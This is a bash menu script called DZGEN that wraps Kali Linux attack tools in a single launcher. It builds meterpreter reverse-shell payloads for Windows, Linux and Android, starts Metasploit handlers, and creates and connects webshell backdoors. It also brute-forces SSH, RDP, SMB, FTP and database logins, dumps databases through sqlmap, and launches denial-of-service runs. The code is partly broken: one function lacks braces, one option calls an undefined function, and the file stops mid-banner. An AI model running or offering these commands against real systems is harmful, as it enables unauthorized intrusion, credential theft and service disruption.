#!/bin/bash
# DZGEN . version 1.0
# DZGEN - Works with Kali Linux tools 
#
#                          Created By Joker-Security
#                       Website: http://www.dev-labs.co
#           YTB : https://www.youtube.com/c/Professionalhacker25
#        FCB : https://www.facebook.com/kali.linux.pentesting.tutorials
#     Special thanks to : Mascerano Bachir , Mohammed Yacine , MrPedroubuntu
#
#Colors
#This colour
cyan='\e[0;36m'
lightcyan='\e[96m'
green='\e[0;32m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
Escape="\033";
white="${Escape}[0m";
RedF="${Escape}[31m";
GreenF="${Escape}[32m";
LighGreenF="${Escape}[92m"
YellowF="${Escape}[33m";
BlueF="${Escape}[34m";
CyanF="${Escape}[36m";
Reset="${Escape}[0m";
# resize terminal window
resize -s 50 90 > /dev/null
#Options
path=`pwd` # Path
payload="" # payload
name="\e[1;34mDZGEN" #Name
VeR="\e[1;31mV1.0" # Version
Author="\e[1;31mJoker-Security" #author
Website="\e[96mwww.dev-labs.co" #web
gith="\e[1;37mwww.github.com/joker25000" #Github
chan="\e[1;32mwww.youtube.com/c/Professionalhacker25" #CHannel
#some variables
DEFAULT_ROUTE=$(ip route show default | awk '/default/ {print $3}')
MYIP=$(ip route show | awk '(NR == 2) {print $9}')
# Check root
[[ `id -u` -eq 0 ]] > /dev/null 2>&1 || { echo  $red "You must be root to run the script"; echo ; exit 1; }
# detect ctrl+c exiting
trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit ..."
sleep 1
echo ""
echo -e $lightgreen"[*] Thanks For Using DZGEN :)"
exit
}
clear
# check internet
function checkinternet {
  ping -c 1 google.com > /dev/null
  if [[ "$?" != 0 ]]
  then
    echo  " Checking For Internet: FAILED
    This Script Needs An Active Internet Connection"
    echo " TOr Will Now Exit"
    echo && sleep 2
    kexit
  else
    echo -e $blue  " -----------------------------------"
    echo -e $green " Checking For Internet: $red CONNECTED"
    echo -e $blue  " -----------------------------------"
  fi
}
checkinternet
sleep 1
#updating your distro
echo
echo -e $blue  "-------------------"
echo -e $green "[ ✔ ] system found."
echo -e $blue  "-------------------"
echo -e $blue
sudo cat /etc/issue.net
#check dependencies existence
echo -e $blue ""
echo "® Checking dependencies configuration ®"
sleep 1
#installer tool 
lnk=$?
if [ $lnk ==  "0" ];then
dir=`pwd` 
scrp="cd $path && ./DZGEN"
rm -f /usr/local/sbin/DZGEN
touch /usr/local/sbin/DZGEN
echo "#!/bin/bash" > /usr/local/sbin/DZGEN
echo $scrp >> /usr/local/sbin/DZGEN
cp $path/config/DZGEN.desktop /usr/share/applications/DZGEN.desktop
cp $path/icons/kali-DZGEN.png /usr/share/icons/kali-DZGEN.png
chmod +x /usr/local/sbin/DZGEN
chmod +x DZGEN
echo -e $red "DZGEN Is Installed In Your System And in Your Application Menu"
fi
#check if xterm is installed
which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Xterm.............................【\e[1;33mFound\e[0m】"
which xterm > /dev/null 2>&1
sleep 1
else
echo ""
echo -e $red "[ X ] xterm -> not found! "
sleep 1
echo -e $yellow "[ ! ] Installing Xterm "
sleep 1
echo -e $green ""
sudo apt-get install xterm -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which xterm > /dev/null 2>&1
fi
# check if xsser is installed
which xsser > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] xsser..............【\e[1;33mFound\e[0m】"
which xsser > /dev/null 2>&1
sleep 1
else
echo -e $red "[ X ] xsser -> not found "
echo -e $yellow "[ ! ] Installing xsser "
sudo apt-get install xsser -y
echo -e $blue "[ ✔ ] Done installing ...."
which xsser > /dev/null 2>&1
sleep 1
fi
# check if Crowbar is installed
which Crowbar > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Crowbar..............【\e[1;33mFound\e[0m】"
which Crowbar > /dev/null 2>&1
sleep 1
else
echo -e $red "[ X ] Crowbar -> not found "
echo -e $yellow "[ ! ] Installing Crowbar "
sudo apt-get install crowbar -y
echo -e $blue "[ ✔ ] Done installing ...."
which Crowbar > /dev/null 2>&1
sleep 1
fi
clear
echo -e "\e[1;32m            -----------------------------------------"
echo -e "          < ! DZGEN-Framework RUning KALI LINUX TOOLS ! >"
echo -e "            ----------------------------------------- "
echo -e "████████▄   ▄███████▄     ▄██████▄     ▄████████ ███▄▄▄▄  "
echo -e "███   ▀███ ██▀     ▄██   ███    ███   ███    ███ ███▀▀▀██▄  "
echo -e "███    ███       ▄███▀   ███    █▀    ███    █▀  ███   ███ "
echo -e "███    ███  ▀█▀▄███▀▄▄  ▄███         ▄███▄▄▄     ███   ███ "
echo -e "███    ███   ▄███▀   ▀ ▀▀███ ████▄  ▀▀███▀▀▀     ███   ███ "
echo -e "███    ███ ▄███▀         ███    ███   ███    █▄  ███   ███ "
echo -e "███   ▄███ ███▄     ▄█   ███    ███   ███    ███ ███   ███ "
echo -e "████████▀   ▀████████▀   ████████▀    ██████████  ▀█   █▀ $VeR"
echo -e "                   < ! DZGEN-Framework ! > "
echo -e "              ╔────────────────────────────╗ "
echo -e "              | Created By Joker-Security  |  "
echo -e "              ╚────────────────────────────╝ "
# directory
directory="$path/Backdoor"
if [ ! -d "$directory" ]; then
    echo "Creating the Backdoor directory..."
    mkdir $directory
        sleep 1
fi
directory="$path/wordlist"
if [ ! -d "$directory" ]; then
    echo "Creating the wordlist directory..."
    mkdir $directory
        sleep 1
fi
# directory
directory="$path/payload"
if [ ! -d "$directory" ]; then
    echo "Creating the payload directory..."
    mkdir $directory
        sleep 1
fi
sleep 2
# Function tool
function ssl()
{
    sslscan $target 
}
function webac()
{
    webacoo -t -u $target
}
function weba()
{
    webacoo -g -o $path/Backdoor/$we.php
}
function weev()
{
    weevely generate $wee $path/Backdoor/$we.php 
}
function weeve()
{
    weevely $target $wee
}
function sql()
{ 
    sqlmap -u $target --dbs    
}
function tab()
{
    sqlmap -u $target -D $name --tables
}
function colu()
{
    sqlmap -u $target -D $name -T $nam --columns
}
function dum()
{
    sqlmap -u $target -D $name -T $nam -C $na --dump 
}
function linux()
{
    xterm -T "☢ CREATE PAYLOAD LINUX ☢" -e msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhst LPORT=$lprt -f elf -o $path/payload/$name.elf
}
function wind()
{
    xterm -T "☢ CREATE PAYLOAD WINDOWS ☢" -e msfvenom -p windows/meterpreter/reverse_tcp lhost=$lhst lport=$lprt -f exe -o $path/payload/$name.exe
}
function android()
{
     xterm -T "☢ CREATE PAYLOAD ANDROID ☢" -e msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhst LPORT=$lprt -a dalvik --platform android R -o $path/payload/$name.apk
}
function remotedp()
{
     hydra -t 4 -V -f -L $usr -P $pass rdp://$ip
}
function post()
{
    hydra -L $usr -P $pass postgres://$ip
}
function mys()
{
    hydra -L $usr -P $pass mysql://$ip
}
function rlogin()
{
    hydra -L $usr -P $pass rlogin://$ip
}
function microds()
{
    hydra -L $usr -P $pass smb://$ip
}
function hydr()
{
     hydra -L $usr -P $pass ftp://$ip
}
function hyd()
{
    hydra -L $usr -P $pass ssh://$ip
}
function hy()
{
    hydra -L $usr -P $pass telnet://$ip
}
function corw()
{
     crowbar -b rdp -U $usr -C $pass -s $ip/24 -v
}
function us()
{
    wpscan --url $target --enumerate u
}
function md()
{
    medusa -h $ip -U $usr -P $pass -M http
}
function med()
{
    medusa -h $ip -u admin -P $pass -M telnet
}
function medu()
{
    medusa -h $ip -U $usr -P $pass -M ssh
}
function medus()
{
    medusa -h $ip -U $usr -P $pass -M ftp
}
function cew()
{
    cewl -w $path/wordlist/word.txt -d 1 -m 3 $target
}
function crun()
{
     crunch 1 5 abcdefg0123456789 -o $path/wordlist/list.txt
}
function xss()
{
    xsser -d "$dork" --De google
}
function uni()
{
    uniscan -u $target  -qweds
}
function dirr()
{
    dirb $target
}
function skip()
{
    skipfish -o 202 $target
}
function wap()
{
    wapiti $target
}
function what()
{
    whatweb $target
}
function caiso()
{
    cge.pl $ip 3
}
function thc-ssl()
{
    thc-ssl-dos $ip --accept
}
function sieg()
{
    siege -v $target
}
function wp()
{
    wpscan --url $target
}
function joom()
{
    joomscan -u $target
}
function golis()
{
    golismero scan $target
}
function nikt()
{
    nikto -h $target
}
function wafw()
{
    wafw00f $target
}
function search()
{
    searchsploit $choise
}
function lyn()
{
    lynis audit system
}
function mass()
{
    masscan -p22,80,445 $ip
}
function dmi()
{
    dmitry $target
}
function the()
{
    theharvester -d $target -l 500 -b google
}
function map()
{
     nmap -sS $ip
}
function web()
{
    whatweb $target
}
function dns()
{
    dnsmap $target
}
function arp()
{
    arping -c 3 $ip
}
function we()
{
    echo -e $red ""
    echo "-------- Name Backdoor ------"
    read -p "Name:~# " we
}
function wee()
{
    echo -e $red ""
    echo "-------- Password Backdoor ------"
    read -p "Password:~# " wee
}
function lhst()
{
    echo -e $red ""
    echo "--------ENTRE LHOST ------"
    read -p "LHOST:~# " lhst
}
function exe()
{
	echo -e -n "$white File Path.exe :~# $red"
    read -e exe 
}
function name()
{

    echo -e $green ""
    echo "--------Your Name Payload ------"
    read -p "Name:~# " name
}
function nam()
{

    echo -e $green ""
    echo "--------Enter Name ------"
    read -p "Name:~# " nam
}
function na()
{

    echo -e $green ""
    echo "--------Enter Name ------"
    read -p "Name:~# " na
}
function lprt()
{

    echo -e $green ""
    echo "--------Entre LPORT ------"
    read -p "LPORT:~# " lprt
}
function psql()
{
    xterm -T "+ SERVICE POSTGRESQL START +" -e service postgresql start 
}
function psq()
{
    xterm -T "+ SERVICE POSTGRESQL STOP +" -e service postgresql stop 
}
function usr()
{
    echo -e -n "$white User Wordlist Path :~# $red"
    read -e usr
}
function choise()
{
    echo -e -n "$white Your Choise :~# $red"
    read -e choise
}
function ip()
{
    echo -e -n "$white Adress ip :~# $red"
    read -e ip
}
function dork()
{
    echo -e -n "$white Dork Entre :~# $red"
    read -e dork
}
function target()
{
    echo -e -n "$white Target :~# $red"
    read -e target
}
function pass()
{
    echo -e -n "$red Password Wordlist Path :~# $lightgreen"
    read -e pass
}
function port()
{
    echo -e -n "$white Port :~# $red"
    read -e port
}
function msf_listener()
{
    echo "use exploit/multi/handler" >> msf.rc 
    echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> msf.rc 
    echo "set LHOST $lhst" >> msf.rc 
    echo "set LPORT $lprt" >> msf.rc
    echo "exploit" >> msf.rc  
    xterm -T "☢ HACKING WINDOWS ☢" -e msfconsole -r msf.rc
}
function msf_linux()
{
    echo "use exploit/multi/handler" >> linux.rc 
    echo "set PAYLOAD linux/x86/meterpreter/reverse_tcp" >> linux.rc 
    echo "set LHOST $lhst" >> linux.rc 
    echo "set LPORT $lprt" >> linux.rc   
    echo "exploit" >> linux.rc  
    xterm -T "☢ HACKING LINUX ☢" -e msfconsole -r linux.rc
}
function msf_android()
{
    echo "use exploit/multi/handler" >> android.rc 
    echo "set PAYLOAD android/meterpreter/reverse_tcp" >> android.rc 
    echo "set LHOST $lhst" >> android.rc 
    echo "set LPORT $lprt" >> android.rc   
    echo "exploit" >> android.rc  
    xterm -T "☢ HACKING ANDROID ☢" -e msfconsole -r android.rc   
}
function clean()
    while true; do
    read -p "[*] Are you sure you want to clean folders? [y/N] = " yn
    case $yn in
    [Yy]* ) rm -rf $path/Backdoor > /dev/null 2>&1;rm -rf $path/wordlist > /dev/null 2>&1;rm -rf $path/payload > /dev/null 2>&1;echo " Files removed [ ✔ ]";exit;;
    [Nn]* ) echo "";echo "Good Bye!";echo "";exit;;
    esac
done
clear
#banner head
function main_menu()
{
    while :
    do
echo -e "           Gateway:\033[32m$DEFAULT_ROUTE |$white My-Ip:$red$MYIP"
echo "           +--^----------,--------,-----,--------^-, "
echo -e "           | $red |||||||||   --------      |         O "
echo -e $cyan"           +---------------------------^----------| "
echo -e $cyan"            \_,---------,---------,--------------' "
echo -e "              / $red"XXXXXX"$cyan /'|       /'  Name = $name  "
echo -e "             / $red"XXXXXX"$cyan /   \    /'  Author = $Author"
echo -e "            / $red"XXXXXX"$cyan / _______/   Website = $Website"
echo -e "           / $red"XXXXXX"$cyan /   Github = $gith "
echo -e "           / $red"XXXXXX"$cyan / Channel =$chan"
echo "           (________( "
echo -e "            ------'        $red   "
echo -e "$lightgreen 1) $red ✔ Information Gathering              $lightgreen 2) $red ✔ Vulnerability Analysis"
echo -e "$lightgreen 3) $red ✔ Web Application Analysis           $lightgreen 4) $red ✔ Password Attacks"
echo -e "$lightgreen 5) $red ✔ Post Exploitation                  $lightgreen 6) $red ✔ Exploitation Tools"
echo -e "$lightgreen 7) $red ✔ Clean File                         $lightgreen 8) $red ✔ About"
echo -e "$lightgreen 0) $red ✔ Exit"
echo -n -e "$lightgreen root@DZGEN:~#: $red"
read -e joker
case $joker in
'1')
###############################
#####Information Gathering#####
###############################
   clear
   echo -e """
   ────────────────────────────────────────────────────────
   ╦┌┐┌┌─┐┌─┐┬─┐┌┬┐┌─┐┌┬┐┬┌─┐┌┐┌  ╔═╗┌─┐┌┬┐┬ ┬┌─┐┬─┐┬┌┐┌┌─┐
   ║│││├┤ │ │├┬┘│││├─┤ │ ││ ││││  ║ ╦├─┤ │ ├─┤├┤ ├┬┘│││││ ┬
   ╩┘└┘└  └─┘┴└─┴ ┴┴ ┴ ┴ ┴└─┘┘└┘  ╚═╝┴ ┴ ┴ ┴ ┴└─┘┴└─┴┘└┘└─┘
   ────────────────────────────────────────────────────────
    $red 1 $white) $lightgreen Nmap Scnning Port
    $red 2 $white) $lightgreen Sslscan Scan SSL Port
    $red 3 $white) $lightgreen Dnsmap DNS Network Mapper
    $red 4 $white) $lightgreen theharvester Collecting emails
    $red 5 $white) $lightgreen ARPing address Resolution Protocol
    $red 6 $white) $lightgreen WAFW00F web Firewall Detection Tool
    $red 7 $white) $lightgreen dmitry Deepmagic Info Gathering Tool
    $red 8 $white) $lightgreen masscan Asynchronous TCP port scanner
    $red 0 $white) $lightgreen back
    """
   echo ""
   echo -e -n "$lightgreen root@DZGEN:~#: $red"
   read -e joker2
   case $joker2 in
    '1')
    echo ""
    ip
    map
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '3')
    echo ""
    target
    dns
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '6')
    echo ""
    target
    wafw
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '5')
    echo ""
    ip
    arp
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '4')
    target
    the
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '7')
    target
    dmi
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '8')
    ip
    mass
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '2')
    target
    ssl 
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '0')
    clear
    ;;
  esac;;
'2')
    clear
    echo -e $white """
____   ____    .__              _____                .__               .__        
\   \ /   /_ __|  |   ____     /  _  \   ____ _____  |  | ___.__. _____|__| ______
 \   Y   /  |  \  |  /    \   /  /_\  \ /    \\__  \ |  |<   |  |/  ___/  |/  ___/
  \     /|  |  /  |_|   |  \ /    |    \   |  \/ __ \|  |_\___  |\___ \|  |\___ \ 
   \___/ |____/|____/___|  / \____|__  /___|  (____  /____/ ____/____  >__/____  >
                         \/          \/     \/     \/     \/         \/        \/    
$red 1 $white) $lightgreen Siege DDOS ATTACK
$red 2 $white) $lightgreen Lynis Auditing Tool
$red 3 $white) $lightgreen Nikto Scan Web Server
$red 4 $white) $lightgreen Golismero Web Site Scan
$red 5 $white) $lightgreen thc-ssl-dos DDos ATTACK
$red 6 $white) $lightgreen Cisco-global-exploiter
$red 0 $white) $lightgreen Back
        """
      echo ""
  echo -e -n "$red root@DZGEN:~#: $lightgreen"
  read -e joker2
  case $joker2 in
   '2')
    lyn
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
  '3')
    target
    nikt
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
  '4')
    target
    golis
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '1')
    target
    sieg
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '5')
    ip
    thc-ssl
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '6')
    ip
    caiso
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '0')
    clear
    ;;
esac;;
'3')
    clear
    echo -e """\e[1;37m
8   8  8                8""""8                8""""8                                       
8   8  8 eeee eeeee     8    8 eeeee eeeee    8    8 eeeee eeeee e   e    e eeeee e  eeeee 
8e  8  8 8    8   8     8eeee8 8   8 8   8    8eeee8 8   8 8   8 8   8    8 8   " 8  8   " 
88  8  8 8eee 8eee8e    88   8 8eee8 8eee8    88   8 8e  8 8eee8 8e  8eeee8 8eeee 8e 8eeee 
88  8  8 88   88   8    88   8 88    88       88   8 88  8 88  8 88    88      88 88    88 
88ee8ee8 88ee 88eee8    88   8 88    88       88   8 88  8 88  8 88eee 88   8ee88 88 8ee88  
$red 1 $white) $lightgreen Dirb Find hidden directories    $red 2 $white) $lightgreen XSSER Find Vulnerable By Dork
$red 3 $white) $lightgreen Whatweb Website Information     $red 4 $white) $lightgreen Uniscan Vulnerability scanner
$red 5 $white) $lightgreen JOOMSCAN Joomla Scanner         $red 6 $white) $lightgreen WPSCAN WordPress Scanner
$red 7 $white) $lightgreen Skipfish web Scanner            $red 8 $white) $lightgreen WAPITI web Scanner
$red 9 $white) $lightgreen WPSCAN Users Finder             $red 0 $white) $lightgreen Back
        """
      echo ""
  echo -e -n "$white root@DZGEN:~#: $red"
  read -e joker2
  case $joker2 in
   '2')
    dork
    xss
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '6')
    target
    wp
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '5')
    target
    joom
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '3')
    target
    what
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '7')
    target
    skip
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '8')
    target
    wap
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '1')
    target
    dirr
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '4')
    target
    uni
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '9')
    target
    us
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '0')
    clear
    ;;
esac;;
'5')
    clear
    echo -e """\e[1;31m
.#####...####...####..######........######.##..##.#####..##......####..######.######.
.##..##.##..##.##.......##..........##......####..##..##.##.....##..##...##.....##...
.#####..##..##..####....##..........####.....##...#####..##.....##..##...##.....##...
.##.....##..##.....##...##..........##......####..##.....##.....##..##...##.....##...
.##......####...####....##..........######.##..##.##.....######..####..######...##...
.....................................................................................
$red 1 $white) $lightgreen Weevely Backdoor - Webshell 
$red 2 $white) $lightgreen WeBaCoo Backdoor - Webshell             
$red 0 $white) $lightgreen Back
        """
      echo ""
  echo -e -n "$lightgreen root@DZGEN:~#: $red"
  read -e joker2
  case $joker2 in
   '3')
    exe
    lhst
    lprt 
    backdor
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '1')
    clear
    echo -e """\e[1;96m
          _______  _______           _______  _             
|\     /|(  ____ \(  ____ \|\     /|(  ____ \( \   |\     /|
| )   ( || (    \/| (    \/| )   ( || (    \/| (   ( \   / )
| | _ | || (__    | (__    | |   | || (__    | |    \ (_) / 
| |( )| ||  __)   |  __)   ( (   ) )|  __)   | |     \   /  \e[1;31m
| || || || (      | (       \ \_/ / | (      | |      ) (   
| () () || (____/\| (____/\  \   /  | (____/\| (____/\| |   
(_______)(_______/(_______/   \_/   (_______/(_______/\_/                                           
             ----------------------------\e[1;36m
             -Weevely Backdor / Webshell-
             ----------------------------\e[1;31m
    1) Create Backdoor
    2) Connect to Server
    0) Back
    """
    echo -e -n "$lightgreen root@DZGEN:~#: $red"
    read -e joker3
    case $joker3 in
    '1')
    wee
    we 
    weev
    echo -e $lightgreen "FILE SAVED IN >>> \e[1;37m'Backdoor'"
    read -p "pess any key to return ..."
    clear
    ;;
    '2')
    target 
    wee
    weeve
    read -p "pess any key to return ..."
    clear
    ;;
    '0')
    clear
    ;;
esac;;
    '0')
    clear
    ;;
    '2')
    clear
    echo -e """\e[1;96m
 ▄█     █▄     ▄████████ ▀█████████▄     ▄████████  ▄████████  ▄██████▄   ▄██████▄  
███     ███   ███    ███   ███    ███   ███    ███ ███    ███ ███    ███ ███    ███ 
███     ███   ███    █▀    ███    ███   ███    ███ ███    █▀  ███    ███ ███    ███ 
███     ███  ▄███▄▄▄      ▄███▄▄▄██▀    ███    ███ ███        ███    ███ ███    ███ \e[1;31m
███     ███ ▀▀███▀▀▀     ▀▀███▀▀▀██▄  ▀███████████ ███        ███    ███ ███    ███ 
███     ███   ███    █▄    ███    ██▄   ███    ███ ███    █▄  ███    ███ ███    ███ 
███ ▄█▄ ███   ███    ███   ███    ███   ███    ███ ███    ███ ███    ███ ███    ███ 
 ▀███▀███▀    ██████████ ▄█████████▀    ███    █▀  ████████▀   ▀██████▀   ▀██████▀  
                        ----------------------------\e[1;36m
                        -WeBaCoo Backdor / Webshell-
                        ----------------------------\e[1;31m
    1) Create Backdoor
    2) Connect to Server
    0) Back
    """
    echo -e -n "$lightgreen root@DZGEN:~#: $red"
    read -e joker3
    case $joker3 in
    '1')
    we 
    weba 
    echo -e $lightgreen "FILE SAVED IN >>> \e[1;37m'Backdoor'"
    read -p "pess any key to return ..."
    clear
    ;;
    '2')
    target 
    webac
    read -p "pess any key to return ..."
    clear
    ;;
    '0')
    clear
    ;;
esac;;
    '0')
    clear
    ;;
esac;;
'4')
    clear
    echo -e """\e[1;31m
.#####...####...####...####..........####..######.######..####...####..##..##..####..
.##..##.##..##.##.....##............##..##...##.....##...##..##.##..##.##.##..##.....
.#####..######..####...####.........######...##.....##...######.##.....####....####..
.##.....##..##.....##.....##........##..##...##.....##...##..##.##..##.##.##......##.
.##.....##..##..####...####.........##..##...##.....##...##..##..####..##..##..####..
.....................................................................................                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
$red 1 $white) $lightgreen Medusa Password Attack                    $red 2 $white) $lightgreen Crunch Wordlist Generator Tool
$red 3 $white) $lightgreen Cewl wordlist From Website                $red 4 $white) $lightgreen Crowbar Brute force rdp
$red 5 $white) $lightgreen Hydra Brute Force tool                    $red 0 $white) $lightgreen Back
        """
      echo ""
  echo -e -n "$lightgreen root@DZGEN:~#: $red"
  read -e joker2
  case $joker2 in
   '2')
    crun
    echo -e $lightgreen "FILE SAVED IN >>> \e[1;37m'WORDLIST'"
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
   '3')
    target
    cew
    echo -e $lightgreen "FILE SAVED IN WORDLIST >>> Name File \e[1;37m'word.txt'"
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '4')
    ip
    usr
    pass
    corw
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
    '1')
    clear
    echo -e """\e[1;36m
███╗   ███╗███████╗██████╗ ██╗   ██╗███████╗ █████╗
████╗ ████║██╔════╝██╔══██╗██║   ██║██╔════╝██╔══██╗
██╔████╔██║█████╗  ██║  ██║██║   ██║███████╗███████║\e[1;31m
██║╚██╔╝██║██╔══╝  ██║  ██║██║   ██║╚════██║██╔══██║
██║ ╚═╝ ██║███████╗██████╔╝╚██████╔╝███████║██║  ██║
╚═╝     ╚═╝╚══════╝╚═════╝  ╚═════╝ ╚══════╝╚═╝  ╚═╝
             --------------------\e[1;36m
             -Medusa Brute Force-
             --------------------\e[1;31m
    1) Brute Force SSH
    2) Brute Force FTP
    3) Brute FOREC HTTP
    4) Brute Force TELNET
    0) Back
    """
    echo -e -n "$lightgreen root@DZGEN:~#: $red"
    read -e joker3
    case $joker3 in
    '1')
    ip
    usr
    pass
    medu
    read -p "pess any key to return ..."
    clear
    ;;
    '2')
    ip
    usr
    pass
    medus
    read -p "pess any key to return ..."
    clear
    ;;
    '3')
    ip
    usr
    pass
    md
    read -p "pess any key to return ..."
    clear
    ;;
    '4')
    ip
    pass
    med
    read -p "pess any key to return ..."
    clear
    ;;
   '0')
    clear
    ;;
esac;;
    '5')
    clear
    echo -e """\e[1;96m
:::    ::: :::   ::: :::::::::  :::::::::      :::
:+:    :+: :+:   :+: :+:    :+: :+:    :+:   :+: :+:
+:+    +:+  +:+ +:+  +:+    +:+ +:+    +:+  +:+   +:+
+#++:++#++   +#++:   +#+    +:+ +#++:++#:  +#++:++#++: \e[1;31m
+#+    +#+    +#+    +#+    +#+ +#+    +#+ +#+     +#+
#+#    #+#    #+#    #+#    #+# #+#    #+# #+#     #+#
###    ###    ###    #########  ###    ### ###     ###
             -------------------\e[1;96m
             -Hydra Brute Force-
             -------------------\e[1;31m
    1) Brute Force SSH
    2) Brute Force FTP
    3) Brute Force RDP
    4) Brute Force TELNET
    5) Brute Force rlogin
    6) Brute Force Mysql
    7) Brute Force Postgresql
    8) Brute Force microsoft-ds
    0) Back
    """
    echo -e -n "$lightgreen root@DZGEN:~#: $red"
    read -e joker3
    case $joker3 in
    '3')
    ip
    usr
    pass
    remotedp
    read -p "pess any key to return ..."
    clear
    ;;
    '1')
    ip
    usr
    pass
    hyd
    read -p "pess any key to return ..."
    clear
    ;;
    '2')
    ip
    usr
    pass
    hydr
    read -p "pess any key to return ..."
    clear
    ;;
    '4')
    ip
    usr
    pass
    hy
    read -p "pess any key to return ..."
    clear
    ;;
    '5')
    ip
    usr
    pass
    rlogin
    read -p "pess any key to return ..."
    clear
    ;;
    '8')
    ip
    usr
    pass
    microds
    read -p "pess any key to return ..."
    clear
    ;;
    '6')
    ip
    usr
    pass
    mys
    read -p "pess any key to return ..."
    clear
    ;;
    '7')
    ip
    usr
    pass
    post
    read -p "pess any key to return ..."
    clear
    ;;
    '0')
    clear
    ;;
esac;;
    '0')
    clear
    ;;
esac;;
'6')
    clear
    echo -e """

 _____            _       _  _         _    _              _____           _
|   __| _ _  ___ | | ___ |_|| |_  ___ | |_ |_| ___  ___   |_   _|___  ___ | | ___
|   __||_'_|| . || || . || ||  _|| .'||  _|| || . ||   |    | | | . || . || ||_ -|
|_____||_,_||  _||_||___||_||_|  |__,||_|  |_||___||_|_|    |_| |___||___||_||___|
            |_|
$red 1 $white) $lightgreen Sqlmap SQL INJECTION HACK  
$red 2 $white) $lightgreen searchsploit Exploit-db search 
$red 3 $white) $lightgreen Msfvenom payload generator Tool
$red 4 $white) $lightgreen Metasploit Framework System Exploit
$red 0 $white) $lightgreen Back
        """
      echo ""
  echo -e -n "$red root@DZGEN:~#: $red"
  read -e joker2
  case $joker2 in
  '2')
    echo ""
    choise
    search
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
  '1')
    echo ""
    target 
    sql
    name 
    tab
    nam 
    colu
    na 
    dum
    echo -e $green "【!】 Main Menu【!】"
    read -p "pess any key to return ..."
    clear
    ;;
  '4')
    clear
    echo -e """\e[1;96m
             ----
          \  (oo)\_______   
             (__)\       )\/
                 ||----w |  
                 ||     ||  
   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _  
  / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ 
 ( M | e | t | a | s | p | l | o | i | t | - | F | r | a | m | e | w | o | r | k )\e[1;31m
  \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/                                                                               
                    -------------------------------------\e[1;96m
                    -Metasploit Framework Exploit System-
                    -------------------------------------\e[1;31m
    1) EXPLOIT LINUX SYSTEM
    2) EXPLOIT WINDOWS SYSTEM 
    3) EXPLOIT ANDROID SYSTEM
    0) Back
    """
    echo -e -n "$lightgreen root@DZGEN:~#: $red"
    read -e joker3
    case $joker3 in
    '2')
    lhst
    lprt
    psql 
    msf_listener
    psq
    rm -rf msf.rc 
    read -p "pess any key to return ..."
    clear
    ;;
    '1')
    lhst
    lprt
    psql 
    msf_linux
    psq
    rm -rf linux.rc
    read -p "pess any key to return ..."
    clear
    ;;
    '3')
    lhst
    lprt
    psql 
    msf_android 
    psq
    rm -rf android.rc
    read -p "pess any key to return ..."
    clear
    ;;
    '0')
    clear
    ;;
esac;;
    '0')
    clear
    ;;
  '3')
    clear
    echo -e """\e[1;96m
##     ##  ######  ######## ##     ## ######## ##    ##  #######  ##     ##    
###   ### ##    ## ##       ##     ## ##       ###   ## ##     ## ###   ###    
#### #### ##       ##       ##     ## ##       ####  ## ##     ## #### ####    
